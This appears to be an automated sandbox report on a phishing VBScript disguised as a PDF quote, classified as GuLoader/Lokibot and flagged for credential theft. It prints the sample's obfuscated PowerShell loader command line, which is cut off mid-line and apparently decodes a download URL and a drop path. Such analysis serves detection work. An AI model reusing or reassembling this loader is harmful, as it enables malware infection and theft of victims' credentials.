Edit tour
Windows
Analysis Report
Request for Proposal Quote_2414976#U00b7pdf.vbs
Overview
General Information
Sample name: | Request for Proposal Quote_2414976#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | Request for Proposal Quote_2414976pdf.vbs |
Analysis ID: | 1428348 |
MD5: | 4c0d5b830080aa8b72546a6d7f924aca |
SHA1: | d061aa6f577e894eb58fd4bc64b366e2e7919630 |
SHA256: | 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0 |
Tags: | vbs |
Infos: | |
Detection
GuLoader, Lokibot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 4320 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Reque st for Pro posal Quot e_2414976# U00b7pdf.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6784 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Superexc rescence = 1;$Necros copic18='S ubstrin';$ Necroscopi c18+='g';F unction Re frig213($K llert){$Ec stasy=$Kll ert.Length -$Superexc rescence;F or($Odeum1 19=7; $Ode um119 -lt $Ecstasy; $Odeum119+ =(8)){$Gum miness+=$K llert.$Nec roscopic18 .Invoke($O deum119, $ Superexcre scence);}$ Gumminess; }function Medicinman ds($Allodi aries){.($ Deviascope ) ($Allodi aries);}$S tyggeres=R efrig213 ' GglendMCo ndensoRuge kaszForkld niP okonsl Fe tivl M inimuaBasi oph/ Skopu ,5Protoc . Si,vanu0Oi lwell Over su (arkite kWPincushi Multiman B ordindProg ramo.endar mwLitesbes Trolje Bo gtilNAa.ne rsT Disput Insta.1Th egidd0typh loe.Luftru m0.onglet; Manipul fi rmaaWOrder leioutpunc nUn.idyu6 Procta4Ang uish; A.ti to Haandst x S heno6F invask4All e dy;Sidev ae Paramyo rPhrensivT ransfo:mel ania1Dejeu ne2Curatis 1,efrica.O rgan.s0Jea nell)Towns id Grundli GD rklore WillsecFor faldkKejse reomaledi /Syresub2 Stjfor0 ue form1Trica ud0Paakal, 0Mesmeri1M iljmyn0S u porh1Bagsd er Pseudof FFalangiiD aleswor Fo lkete etak infPa,tagn oLeukocixS mearin/Par tic 1Feuda ls2Skildre 1Frdiggr. Bredba0Ufo rsta ';$Un psychologi cally253=R efrig213 ' OvereksU I nvestsArti culeBaker. trDatasty- .edgrelASp ulziegAnil infeFemogt ynEpithemt Det,nat '; $Cereals14 8=Refrig21 3 'Jomfrut hTippie,tF a,iaditInd olsspNivea uosSeriepr :Saetn n/S u.erbi/Dek o.atd slit lirJuleros iGypterev SecreteAss is,e..entr algForkvi oSv,desto Buntmag De filal Verd eneMesmeri .NringsvcI soca,poWh. tewamHoved pr/ .ovord uPar,gracS queaks?gra vigreCobal tix ,tryge pTrsteproU n ullerSom iklet fork ar=Toldgrn dSkuerr,os tatsmawPa oxysn Metr iclTranspo oBeerhouaH errengdGar d.ro&Alarm tiiDisqu,l dT.skeee=L uftlag1Re tallN Driv tmuFore.ad RFalckcesP robity3 To nic.3 Glum mepRegel,t Jin,ulcaX Evani,EDjv elsbZNgleb enqSki.opp H reforgl Prmier9Des olatcSkjte rnIQuackst aIndru lf AflireO Po ly.lpQuali tyy Intero aDivedam6C oolamouKal keri7Skalp e IEnhedsp 1Lin eluvB aggaarPTek stbeKBegon iaV Immome ';$modula rization=R efrig213 ' Steelwo>Me ddele ';$D eviascope= Refrig213 ' InventiK ara,sceSaf tp.exDyret mm ';$Bund skrabets = Refrig213 'Ass mese ,ilestocUs u apihJoin i,goM.nksc o majo,em% resultaPo sto,tp Smu .hupGreeki zdGru dtra SlaumptMi thraiaVelg rer%Mirthf ,\Tendensg PreseneTr ykkernforb rusnUrkrft eeFrequenm SylteksPo lyce.gGyri akn Ref,r miPrecooln Opret.eg g sindssAdsk il,.antast eFTall,nja AcetoacsSt artsy Ster eot&Exodus &Gu.runn D.laasee . athogcmuri atehBaggin go Baptis Serozem$ v g.igh ';Me dicinmands (Refrig21 3 'B ckpac $RrgtracgD alboarlbed rageoGrunt hubBeecher aHaikunml Kilede:R a gummG rund leShackinw ImpardogEl